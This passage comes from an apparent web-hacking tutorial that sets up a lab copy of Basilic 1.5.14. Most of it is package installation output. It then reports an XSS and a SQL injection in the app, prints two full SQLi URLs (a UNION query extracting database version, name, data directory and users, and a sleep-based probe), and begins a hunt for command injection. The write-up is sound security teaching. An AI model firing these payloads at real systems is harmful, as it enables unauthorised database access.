class="code-line"span class="normal" 62/span/span span class="code-line"span class="normal" 63/span/span span class="code-line"span class="normal" 64/span/span span class="code-line"span class="normal" 65/span/span span class="code-line"span class="normal" 66/span/span span class="code-line"span class="normal" 67/span/span span class="code-line"span class="normal" 68/span/span span class="code-line"span class="normal" 69/span/span span class="code-line"span class="normal" 70/span/span span class="code-line"span class="normal" 71/span/span span class="code-line"span class="normal" 72/span/span span class="code-line"span class="normal" 73/span/span span class="code-line"span class="normal" 74/span/span span class="code-line"span class="normal" 75/span/span span class="code-line"span class="normal" 76/span/span span class="code-line"span class="normal" 77/span/span span class="code-line"span class="normal" 78/span/span span class="code-line"span class="normal" 79/span/span span class="code-line"span class="normal" 80/span/span span class="code-line"span class="normal" 81/span/span span class="code-line"span class="normal" 82/span/span span class="code-line"span class="normal" 83/span/span span class="code-line"span class="normal" 84/span/span span class="code-line"span class="normal" 85/span/span span class="code-line"span class="normal" 86/span/span span class="code-line"span class="normal" 87/span/span span class="code-line"span class="normal" 88/span/span span class="code-line"span class="normal" 89/span/span span class="code-line"span class="normal" 90/span/span span class="code-line"span class="normal" 91/span/span span class="code-line"span class="normal" 92/span/span span class="code-line"span class="normal" 93/span/span span class="code-line"span class="normal" 94/span/span span class="code-line"span class="normal" 95/span/span span class="code-line"span class="normal" 96/span/span span class="code-line"span class="normal" 97/span/span span class="code-line"span class="normal" 98/span/span span class="code-line"span class="normal" 99/span/span span class="code-line"span class="normal"100/span/span span class="code-line"span class="normal"101/span/span span class="code-line"span class="normal"102/span/span span class="code-line"span class="normal"103/span/span span class="code-line"span class="normal"104/span/span span class="code-line"span class="normal"105/span/span span class="code-line"span class="normal"106/span/span span class="code-line"span class="normal"107/span/span span class="code-line"span class="normal"108/span/span span class="code-line"span class="normal"109/span/span span class="code-line"span class="normal"110/span/span span class="code-line"span class="normal"111/span/span span class="code-line"span class="normal"112/span/span span class="code-line"span class="normal"113/span/span span class="code-line"span class="normal"114/span/span span class="code-line"span class="normal"115/span/span span class="code-line"span class="normal"116/span/span span class="code-line"span class="normal"117/span/span span class="code-line"span class="normal"118/span/span span class="code-line"span class="normal"119/span/span span class="code-line"span class="normal"120/span/span span class="code-line"span class="normal"121/span/span span class="code-line"span class="normal"122/span/span span class="code-line"span class="normal"123/span/span span class="code-line"span class="normal"124/span/span span class="code-line"span class="normal"125/span/span span class="code-line"span class="normal"126/span/span span class="code-line"span class="normal"127/span/span span class="code-line"span class="normal"128/span/span span class="code-line"span class="normal"129/span/span span class="code-line"span class="normal"130/span/span span class="code-line"span class="normal"131/span/span span class="code-line"span class="normal"132/span/span span class="code-line"span class="normal"133/span/span span class="code-line"span class="normal"134/span/span span class="code-line"span class="normal"135/span/span span class="code-line"span class="normal"136/span/span span class="code-line"span class="normal"137/span/span span class="code-line"span class="normal"138/span/span span class="code-line"span class="normal"139/span/span span class="code-line"span class="normal"140/span/span span class="code-line"span class="normal"141/span/span span class="code-line"span class="normal"142/span/span span class="code-line"span class="normal"143/span/span span class="code-line"span class="normal"144/span/span span class="code-line"span class="normal"145/span/span span class="code-line"span class="normal"146/span/span span class="code-line"span class="normal"147/span/span span class="code-line"span class="normal"148/span/span span class="code-line"span class="normal"149/span/span span class="code-line"span class="normal"150/span/span span class="code-line"span class="normal"151/span/span span class="code-line"span class="normal"152/span/span span class="code-line"span class="normal"153/span/span span class="code-line"span class="normal"154/span/span span class="code-line"span class="normal"155/span/span span class="code-line"span class="normal"156/span/span span class="code-line"span class="normal"157/span/span span class="code-line"span class="normal"158/span/span span class="code-line"span class="normal"159/span/span span class="code-line"span class="normal"160/span/span span class="code-line"span class="normal"161/span/span span class="code-line"span class="normal"162/span/span span class="code-line"span class="normal"163/span/span span class="code-line"span class="normal"164/span/span span class="code-line"span class="normal"165/span/span span class="code-line"span class="normal"166/span/span span class="code-line"span class="normal"167/span/span span class="code-line"span class="normal"168/span/span span class="code-line"span class="normal"169/span/span span class="code-line"span class="normal"170/span/span span class="code-line"span class="normal"171/span/span span class="code-line"span class="normal"172/span/span span class="code-line"span class="normal"173/span/span span class="code-line"span class="normal"174/span/span span class="code-line"span class="normal"175/span/span span class="code-line"span class="normal"176/span/span span class="code-line"span class="normal"177/span/span span class="code-line"span class="normal"178/span/span span class="code-line"span class="normal"179/span/span span class="code-line"span class="normal"180/span/span span class="code-line"span class="normal"181/span/span span class="code-line"span class="normal"182/span/span span class="code-line"span class="normal"183/span/span span class="code-line"span class="normal"184/span/span span class="code-line"span class="normal"185/span/span span class="code-line"span class="normal"186/span/span span class="code-line"span class="normal"187/span/span span class="code-line"span class="normal"188/span/span span class="code-line"span class="normal"189/span/span span class="code-line"span class="normal"190/span/span span class="code-line"span class="normal"191/span/span span class="code-line"span class="normal"192/span/span span class="code-line"span class="normal"193/span/span span class="code-line"span class="normal"194/span/span span class="code-line"span class="normal"195/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:/var/www/basilic-1.5.14# /spanapt-get install graphicsmagick-imagemagick-compat/span span class="code-line"span class="go"Reading package lists... Done/span/span span class="code-line"span class="go"Building dependency tree /span/span span class="code-line"span class="go"Reading state information... Done/span/span span class="code-line"span class="go"The following extra packages will be installed:/span/span span class="code-line"span class="go" fontconfig-config fonts-droid ghostscript graphicsmagick gsfonts libavahi-client3 libavahi-common-data libavahi-common3 libcups2/span/span span class="code-line"span class="go" libcupsimage2 libffi5 libfontconfig1 libgdk-pixbuf2.0-0 libgdk-pixbuf2.0-common libglib2.0-0 libglib2.0-data libgomp1/span/span span class="code-line"span class="go" libgraphicsmagick3 libgs9 libgs9-common libice6 libijs-0.35 libjasper1 libjbig0 libjbig2dec0 libjpeg8 liblcms1 liblcms2-2 libltdl7/span/span span class="code-line"span class="go" libpaper-utils libpaper1 libpng12-0 libsm6 libtiff4 libwmf0.2-7 poppler-data shared-mime-info ttf-dejavu-core x11-common/span/span span class="code-line"span class="go"Suggested packages:/span/span span class="code-line"span class="go" ghostscript-cups ghostscript-x hpijs graphicsmagick-dbg cups-common libjasper-runtime liblcms-utils liblcms2-utils poppler-utils/span/span span class="code-line"span class="go" fonts-japanese-mincho fonts-ipafont-mincho fonts-japanese-gothic fonts-ipafont-gothic fonts-arphic-ukai fonts-arphic-uming/span/span span class="code-line"span class="go" fonts-unfonts-core/span/span span class="code-line"span class="go"The following NEW packages will be installed:/span/span span class="code-line"span class="go" fontconfig-config fonts-droid ghostscript graphicsmagick graphicsmagick-imagemagick-compat gsfonts libavahi-client3/span/span span class="code-line"span class="go" libavahi-common-data libavahi-common3 libcups2 libcupsimage2 libffi5 libfontconfig1 libgdk-pixbuf2.0-0 libgdk-pixbuf2.0-common/span/span span class="code-line"span class="go" libglib2.0-0 libglib2.0-data libgomp1 libgraphicsmagick3 libgs9 libgs9-common libice6 libijs-0.35 libjasper1 libjbig0 libjbig2dec0/span/span span class="code-line"span class="go" libjpeg8 liblcms1 liblcms2-2 libltdl7 libpaper-utils libpaper1 libpng12-0 libsm6 libtiff4 libwmf0.2-7 poppler-data shared-mime-info/span/span span class="code-line"span class="go" ttf-dejavu-core x11-common/span/span span class="code-line"span class="go"0 upgraded, 40 newly installed, 0 to remove and 0 not upgraded./span/span span class="code-line"span class="go"Need to get 24.4 MB of archives./span/span span class="code-line"span class="go"After this operation, 78.4 MB of additional disk space will be used./span/span span class="code-line"span class="go"Do you want to continue [Y/n]? /span/span span class="code-line"span class="go"Get:1 http://ftp.uk.debian.org/debian/ wheezy/main libavahi-common-data amd64 0.6.31-2 [135 kB]/span/span span class="code-line"span class="go"Get:2 http://ftp.uk.debian.org/debian/ wheezy/main libavahi-common3 amd64 0.6.31-2 [54.6 kB] /span/span span class="code-line"span class="go"Get:3 http://ftp.uk.debian.org/debian/ wheezy/main libavahi-client3 amd64 0.6.31-2 [59.5 kB]/span/span span class="code-line"span class="go"Get:4 http://ftp.uk.debian.org/debian/ wheezy/main libcups2 amd64 1.5.3-5+deb7u1 [255 kB]/span/span span class="code-line"span class="go"Get:5 http://ftp.uk.debian.org/debian/ wheezy/main libjpeg8 amd64 8d-1 [134 kB]/span/span span class="code-line"span class="go"Get:6 http://ftp.uk.debian.org/debian/ wheezy/main libpng12-0 amd64 1.2.49-1 [190 kB]/span/span span class="code-line"span class="go"Get:7 http://ftp.uk.debian.org/debian/ wheezy/main libjbig0 amd64 2.0-2+deb7u1 [32.6 kB]/span/span span class="code-line"span class="go"Get:8 http://ftp.uk.debian.org/debian/ wheezy/main libtiff4 amd64 3.9.6-11 [202 kB]/span/span span class="code-line"span class="go"Get:9 http://ftp.uk.debian.org/debian/ wheezy/main libcupsimage2 amd64 1.5.3-5+deb7u1 [138 kB] /span/span span class="code-line"span class="go"Get:10 http://ftp.uk.debian.org/debian/ wheezy/main libffi5 amd64 3.0.10-3 [24.8 kB] /span/span span class="code-line"span class="go"Get:11 http://ftp.uk.debian.org/debian/ wheezy/main ttf-dejavu-core all 2.33-3 [1,021 kB] /span/span span class="code-line"span class="go"Get:12 http://ftp.uk.debian.org/debian/ wheezy/main fontconfig-config all 2.9.0-7.1 [233 kB] /span/span span class="code-line"span class="go"Get:13 http://ftp.uk.debian.org/debian/ wheezy/main libfontconfig1 amd64 2.9.0-7.1 [300 kB] /span/span span class="code-line"span class="go"Get:14 http://ftp.uk.debian.org/debian/ wheezy/main libglib2.0-0 amd64 2.33.12+really2.32.4-5 [1,838 kB] /span/span span class="code-line"span class="go"Get:15 http://ftp.uk.debian.org/debian/ wheezy/main libjasper1 amd64 1.900.1-13 [159 kB] /span/span span class="code-line"span class="go"Get:16 http://ftp.uk.debian.org/debian/ wheezy/main libgdk-pixbuf2.0-common all 2.26.1-1 [497 kB] /span/span span class="code-line"span class="go"Get:17 http://ftp.uk.debian.org/debian/ wheezy/main libgdk-pixbuf2.0-0 amd64 2.26.1-1 [207 kB] /span/span span class="code-line"span class="go"Get:18 http://ftp.uk.debian.org/debian/ wheezy/main libgomp1 amd64 4.7.2-5 [27.5 kB] /span/span span class="code-line"span class="go"Get:19 http://ftp.uk.debian.org/debian/ wheezy/main x11-common all 1:7.7+3~deb7u1 [284 kB] /span/span span class="code-line"span class="go"Get:20 http://ftp.uk.debian.org/debian/ wheezy/main libice6 amd64 2:1.0.8-2 [63.1 kB] /span/span span class="code-line"span class="go"Get:21 http://ftp.uk.debian.org/debian/ wheezy/main liblcms1 amd64 1.19.dfsg-1.2 [113 kB] /span/span span class="code-line"span class="go"Get:22 http://ftp.uk.debian.org/debian/ wheezy/main liblcms2-2 amd64 2.2+git20110628-2.2+deb7u1 [144 kB] /span/span span class="code-line"span class="go"Get:23 http://ftp.uk.debian.org/debian/ wheezy/main libltdl7 amd64 2.4.2-1.1 [352 kB] /span/span span class="code-line"span class="go"Get:24 http://ftp.uk.debian.org/debian/ wheezy/main libpaper1 amd64 1.1.24+nmu2 [22.0 kB] /span/span span class="code-line"span class="go"Get:25 http://ftp.uk.debian.org/debian/ wheezy/main libsm6 amd64 2:1.2.1-2 [34.2 kB] /span/span span class="code-line"span class="go"Get:26 http://ftp.uk.debian.org/debian/ wheezy/main libwmf0.2-7 amd64 0.2.8.4-10.3 [193 kB] /span/span span class="code-line"span class="go"Get:27 http://ftp.uk.debian.org/debian/ wheezy/main poppler-data all 0.4.5-10 [1,479 kB] /span/span span class="code-line"span class="go"Get:28 http://ftp.uk.debian.org/debian/ wheezy/main fonts-droid all 20111207+git-1 [4,312 kB] /span/span span class="code-line"span class="go"Get:29 http://ftp.uk.debian.org/debian/ wheezy/main libijs-0.35 amd64 0.35-8 [20.4 kB] /span/span span class="code-line"span class="go"Get:30 http://ftp.uk.debian.org/debian/ wheezy/main libjbig2dec0 amd64 0.11+20120125-1 [51.8 kB] /span/span span class="code-line"span class="go"Get:31 http://ftp.uk.debian.org/debian/ wheezy/main libgs9-common all 9.05~dfsg-6.3+deb7u1 [1,980 kB] /span/span span class="code-line"span class="go"Get:32 http://ftp.uk.debian.org/debian/ wheezy/main libgs9 amd64 9.05~dfsg-6.3+deb7u1 [1,844 kB] /span/span span class="code-line"span class="go"Get:33 http://ftp.uk.debian.org/debian/ wheezy/main gsfonts all 1:8.11+urwcyr1.0.7~pre44-4.2 [3,364 kB] /span/span span class="code-line"span class="go"Get:34 http://ftp.uk.debian.org/debian/ wheezy/main ghostscript amd64 9.05~dfsg-6.3+deb7u1 [80.0 kB] /span/span span class="code-line"span class="go"Get:35 http://ftp.uk.debian.org/debian/ wheezy/main libgraphicsmagick3 amd64 1.3.16-1.1 [1,320 kB] /span/span span class="code-line"span class="go"Get:36 http://ftp.uk.debian.org/debian/ wheezy/main graphicsmagick amd64 1.3.16-1.1 [1,029 kB] /span/span span class="code-line"span class="go"Get:37 http://ftp.uk.debian.org/debian/ wheezy/main libglib2.0-data all 2.33.12+really2.32.4-5 [1,607 kB] /span/span span class="code-line"span class="go"Get:38 http://ftp.uk.debian.org/debian/ wheezy/main libpaper-utils amd64 1.1.24+nmu2 [18.3 kB] /span/span span class="code-line"span class="go"Get:39 http://ftp.uk.debian.org/debian/ wheezy/main shared-mime-info amd64 1.0-1+b1 [595 kB] /span/span span class="code-line"span class="go"Get:40 http://ftp.uk.debian.org/debian/ wheezy/main graphicsmagick-imagemagick-compat all 1.3.16-1.1 [15.9 kB] /span/span span class="code-line"span class="go"Fetched 24.4 MB in 1min 43s (236 kB/s) /span/span span class="code-line"span class="go"Extracting templates from packages: 100%/span/span span class="code-line"span class="go"Preconfiguring packages .../span/span span class="code-line"span class="go"Selecting previously unselected package libavahi-common-data:amd64./span/span span class="code-line"span class="gp gp-VirtualEnv"(Reading database ... 28686 files and directories currently installed.)/span/span span class="code-line"span class="go"Unpacking libavahi-common-data:amd64 (from .../libavahi-common-data_0.6.31-2_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libavahi-common3:amd64./span/span span class="code-line"span class="go"Unpacking libavahi-common3:amd64 (from .../libavahi-common3_0.6.31-2_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libavahi-client3:amd64./span/span span class="code-line"span class="go"Unpacking libavahi-client3:amd64 (from .../libavahi-client3_0.6.31-2_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libcups2:amd64./span/span span class="code-line"span class="go"Unpacking libcups2:amd64 (from .../libcups2_1.5.3-5+deb7u1_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libjpeg8:amd64./span/span span class="code-line"span class="go"Unpacking libjpeg8:amd64 (from .../libjpeg8_8d-1_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libpng12-0:amd64./span/span span class="code-line"span class="go"Unpacking libpng12-0:amd64 (from .../libpng12-0_1.2.49-1_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libjbig0:amd64./span/span span class="code-line"span class="go"Unpacking libjbig0:amd64 (from .../libjbig0_2.0-2+deb7u1_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libtiff4:amd64./span/span span class="code-line"span class="go"Unpacking libtiff4:amd64 (from .../libtiff4_3.9.6-11_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libcupsimage2:amd64./span/span span class="code-line"span class="go"Unpacking libcupsimage2:amd64 (from .../libcupsimage2_1.5.3-5+deb7u1_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libffi5:amd64./span/span span class="code-line"span class="go"Unpacking libffi5:amd64 (from .../libffi5_3.0.10-3_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package ttf-dejavu-core./span/span span class="code-line"span class="go"Unpacking ttf-dejavu-core (from .../ttf-dejavu-core_2.33-3_all.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package fontconfig-config./span/span span class="code-line"span class="go"Unpacking fontconfig-config (from .../fontconfig-config_2.9.0-7.1_all.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libfontconfig1:amd64./span/span span class="code-line"span class="go"Unpacking libfontconfig1:amd64 (from .../libfontconfig1_2.9.0-7.1_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libglib2.0-0:amd64./span/span span class="code-line"span class="go"Unpacking libglib2.0-0:amd64 (from .../libglib2.0-0_2.33.12+really2.32.4-5_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libjasper1:amd64./span/span span class="code-line"span class="go"Unpacking libjasper1:amd64 (from .../libjasper1_1.900.1-13_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libgdk-pixbuf2.0-common./span/span span class="code-line"span class="go"Unpacking libgdk-pixbuf2.0-common (from .../libgdk-pixbuf2.0-common_2.26.1-1_all.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libgdk-pixbuf2.0-0:amd64./span/span span class="code-line"span class="go"Unpacking libgdk-pixbuf2.0-0:amd64 (from .../libgdk-pixbuf2.0-0_2.26.1-1_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libgomp1:amd64./span/span span class="code-line"span class="go"Unpacking libgomp1:amd64 (from .../libgomp1_4.7.2-5_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package x11-common./span/span span class="code-line"span class="go"Unpacking x11-common (from .../x11-common_1%3a7.7+3~deb7u1_all.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libice6:amd64./span/span span class="code-line"span class="go"Unpacking libice6:amd64 (from .../libice6_2%3a1.0.8-2_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package liblcms1:amd64./span/span span class="code-line"span class="go"Unpacking liblcms1:amd64 (from .../liblcms1_1.19.dfsg-1.2_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package liblcms2-2:amd64./span/span span class="code-line"span class="go"Unpacking liblcms2-2:amd64 (from .../liblcms2-2_2.2+git20110628-2.2+deb7u1_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libltdl7:amd64./span/span span class="code-line"span class="go"Unpacking libltdl7:amd64 (from .../libltdl7_2.4.2-1.1_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libpaper1:amd64./span/span span class="code-line"span class="go"Unpacking libpaper1:amd64 (from .../libpaper1_1.1.24+nmu2_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libsm6:amd64./span/span span class="code-line"span class="go"Unpacking libsm6:amd64 (from .../libsm6_2%3a1.2.1-2_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libwmf0.2-7:amd64./span/span span class="code-line"span class="go"Unpacking libwmf0.2-7:amd64 (from .../libwmf0.2-7_0.2.8.4-10.3_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package poppler-data./span/span span class="code-line"span class="go"Unpacking poppler-data (from .../poppler-data_0.4.5-10_all.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package fonts-droid./span/span span class="code-line"span class="go"Unpacking fonts-droid (from .../fonts-droid_20111207+git-1_all.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libijs-0.35./span/span span class="code-line"span class="go"Unpacking libijs-0.35 (from .../libijs-0.35_0.35-8_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libjbig2dec0./span/span span class="code-line"span class="go"Unpacking libjbig2dec0 (from .../libjbig2dec0_0.11+20120125-1_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libgs9-common./span/span span class="code-line"span class="go"Unpacking libgs9-common (from .../libgs9-common_9.05~dfsg-6.3+deb7u1_all.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libgs9./span/span span class="code-line"span class="go"Unpacking libgs9 (from .../libgs9_9.05~dfsg-6.3+deb7u1_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package gsfonts./span/span span class="code-line"span class="go"Unpacking gsfonts (from .../gsfonts_1%3a8.11+urwcyr1.0.7~pre44-4.2_all.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package ghostscript./span/span span class="code-line"span class="go"Unpacking ghostscript (from .../ghostscript_9.05~dfsg-6.3+deb7u1_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libgraphicsmagick3./span/span span class="code-line"span class="go"Unpacking libgraphicsmagick3 (from .../libgraphicsmagick3_1.3.16-1.1_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package graphicsmagick./span/span span class="code-line"span class="go"Unpacking graphicsmagick (from .../graphicsmagick_1.3.16-1.1_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libglib2.0-data./span/span span class="code-line"span class="go"Unpacking libglib2.0-data (from .../libglib2.0-data_2.33.12+really2.32.4-5_all.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libpaper-utils./span/span span class="code-line"span class="go"Unpacking libpaper-utils (from .../libpaper-utils_1.1.24+nmu2_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package shared-mime-info./span/span span class="code-line"span class="go"Unpacking shared-mime-info (from .../shared-mime-info_1.0-1+b1_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package graphicsmagick-imagemagick-compat./span/span span class="code-line"span class="go"Unpacking graphicsmagick-imagemagick-compat (from .../graphicsmagick-imagemagick-compat_1.3.16-1.1_all.deb) .../span/span span class="code-line"span class="go"Processing triggers for man-db .../span/span span class="code-line"span class="go"Processing triggers for mime-support .../span/span span class="code-line"span class="go"Setting up libavahi-common-data:amd64 (0.6.31-2) .../span/span span class="code-line"span class="go"Setting up libavahi-common3:amd64 (0.6.31-2) .../span/span span class="code-line"span class="go"Setting up libavahi-client3:amd64 (0.6.31-2) .../span/span span class="code-line"span class="go"Setting up libcups2:amd64 (1.5.3-5+deb7u1) .../span/span span class="code-line"span class="go"Setting up libjpeg8:amd64 (8d-1) .../span/span span class="code-line"span class="go"Setting up libpng12-0:amd64 (1.2.49-1) .../span/span span class="code-line"span class="go"Setting up libjbig0:amd64 (2.0-2+deb7u1) .../span/span span class="code-line"span class="go"Setting up libtiff4:amd64 (3.9.6-11) .../span/span span class="code-line"span class="go"Setting up libcupsimage2:amd64 (1.5.3-5+deb7u1) .../span/span span class="code-line"span class="go"Setting up libffi5:amd64 (3.0.10-3) .../span/span span class="code-line"span class="go"Setting up ttf-dejavu-core (2.33-3) .../span/span span class="code-line"span class="go"Setting up fontconfig-config (2.9.0-7.1) .../span/span span class="code-line"span class="go"Setting up libfontconfig1:amd64 (2.9.0-7.1) .../span/span span class="code-line"span class="go"Setting up libglib2.0-0:amd64 (2.33.12+really2.32.4-5) .../span/span span class="code-line"span class="go"No schema files found: doing nothing./span/span span class="code-line"span class="go"Setting up libjasper1:amd64 (1.900.1-13) .../span/span span class="code-line"span class="go"Setting up libgdk-pixbuf2.0-common (2.26.1-1) .../span/span span class="code-line"span class="go"Setting up libgdk-pixbuf2.0-0:amd64 (2.26.1-1) .../span/span span class="code-line"span class="go"Setting up libgomp1:amd64 (4.7.2-5) .../span/span span class="code-line"span class="go"Setting up x11-common (1:7.7+3~deb7u1) .../span/span span class="code-line"span class="go"[ ok ] Setting up X socket directories... /tmp/.X11-unix /tmp/.ICE-unix./span/span span class="code-line"span class="go"Setting up libice6:amd64 (2:1.0.8-2) .../span/span span class="code-line"span class="go"Setting up liblcms1:amd64 (1.19.dfsg-1.2) .../span/span span class="code-line"span class="go"Setting up liblcms2-2:amd64 (2.2+git20110628-2.2+deb7u1) .../span/span span class="code-line"span class="go"Setting up libltdl7:amd64 (2.4.2-1.1) .../span/span span class="code-line"span class="go"Setting up libpaper1:amd64 (1.1.24+nmu2) .../span/span span class="code-line"/span span class="code-line"span class="go"Creating config file /etc/papersize with new version/span/span span class="code-line"span class="go"Setting up libsm6:amd64 (2:1.2.1-2) .../span/span span class="code-line"span class="go"Setting up libwmf0.2-7:amd64 (0.2.8.4-10.3) .../span/span span class="code-line"span class="go"Setting up poppler-data (0.4.5-10) .../span/span span class="code-line"span class="go"Setting up fonts-droid (20111207+git-1) .../span/span span class="code-line"span class="go"Setting up libijs-0.35 (0.35-8) .../span/span span class="code-line"span class="go"Setting up libjbig2dec0 (0.11+20120125-1) .../span/span span class="code-line"span class="go"Setting up libgs9-common (9.05~dfsg-6.3+deb7u1) .../span/span span class="code-line"span class="go"Setting up libgs9 (9.05~dfsg-6.3+deb7u1) .../span/span span class="code-line"span class="go"Setting up gsfonts (1:8.11+urwcyr1.0.7~pre44-4.2) .../span/span span class="code-line"span class="go"Setting up ghostscript (9.05~dfsg-6.3+deb7u1) .../span/span span class="code-line"span class="go"Setting up libgraphicsmagick3 (1.3.16-1.1) .../span/span span class="code-line"span class="go"Setting up graphicsmagick (1.3.16-1.1) .../span/span span class="code-line"span class="go"Setting up libglib2.0-data (2.33.12+really2.32.4-5) .../span/span span class="code-line"span class="go"Setting up libpaper-utils (1.1.24+nmu2) .../span/span span class="code-line"span class="go"Setting up shared-mime-info (1.0-1+b1) .../span/span span class="code-line"span class="go"Setting up graphicsmagick-imagemagick-compat (1.3.16-1.1) .../span/span span class="code-line"span class="gp"[email protected]:/var/www/basilic-1.5.14# /spanspan class="nb"cd/span ../../span span class="code-line"span class="gp"[email protected]:/var# /spanchown -R www-data:www-data www//span span class="code-line"/code/pre/div /td/tr/table pOne last look at the codecheckConfig.php/code script and everything, other than the IP and lab name, is correct (I'm sure we can carry on without those 2 things)./p h2Getting To Know The App/h2 pFirstly I'd like to say that this application is riddled with vulnerabilities, after using the application for a short while I found an a href="https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29" target="_blank"XSS/a:/p pimg src="/assets/images/web-hacking/basilic-xss.png" width="750" height="500"/p pAnd an a href="https://www.owasp.org/index.php/SQL_Injection" target="_blank"SQLi/a in the same field of the same page!:/p pimg src="/assets/images/web-hacking/basilic-sqli.png" width="750" height="500"/p pThe full URL for the above SQLi is:/p pcodehttp://dev/basilic-1.5.14/Public/?author=foo%27%20union%20select%201,%202,%20%28select%20version%28%29%29,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%20%28select%20database%28%29%29,%2016,%2017,%20%28select%[email protected]@datadir%29,%2019,%2020,%2021,%2022,%2023,%20%28select%20system_user%28%29%29,%20%28select%20user%28%29%29;%20--%20amp;title=baramp;year=-1amp;display=listamp;x=0amp;y=0/code/p pI found this SQLi using this URL:/p pcodehttp://dev/basilic-1.5.14/Public/?author=foo%27%20union%20select%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20null,%20sleep%2815%29;%20--%20amp;title=baramp;year=-1amp;display=listamp;x=0amp;y=0/code/p pBut we are here to find a command injection./p pNow that we have it installed, its time to get to know the application. We know there is a command injection, we know its written in PHP and we have the source code, so let's search through the source code for a href="http://www.php.net/manual/en/function.system.php" target="_blank"codesystem/code/a:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/span span class="code-line"span class="normal"55/span/span span class="code-line"span class="normal"56/span/span span class="code-line"span class="normal"57/span/span span class="code-line"span class="normal"58/span/span span class="code-line"span class="normal"59/span/span span class="code-line"span class="normal"60/span/span span class="code-line"span class="normal"61/span/span span class="code-line"span class="normal"62/span/span span class="code-line"span class="normal"63/span/span span class="code-line"span class="normal"64/span/span span class="code-line"span class="normal"65/span/span span class="code-line"span class="normal"66/span/span span class="code-line"span class="normal"67/span/span span class="code-line"span class="normal"68/span/span span class="code-line"span class="normal"69/span/span span class="code-line"span class="normal"70/span/span span class="code-line"span class="normal"71/span/span span class="code-line"span class="normal"72/span/span span class="code-line"span class="normal"73/span/span span class="code-line"span class="normal"74/span/span span class="code-line"span class="normal"75/span/span span class="code-line"span class="normal"76/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:/var# 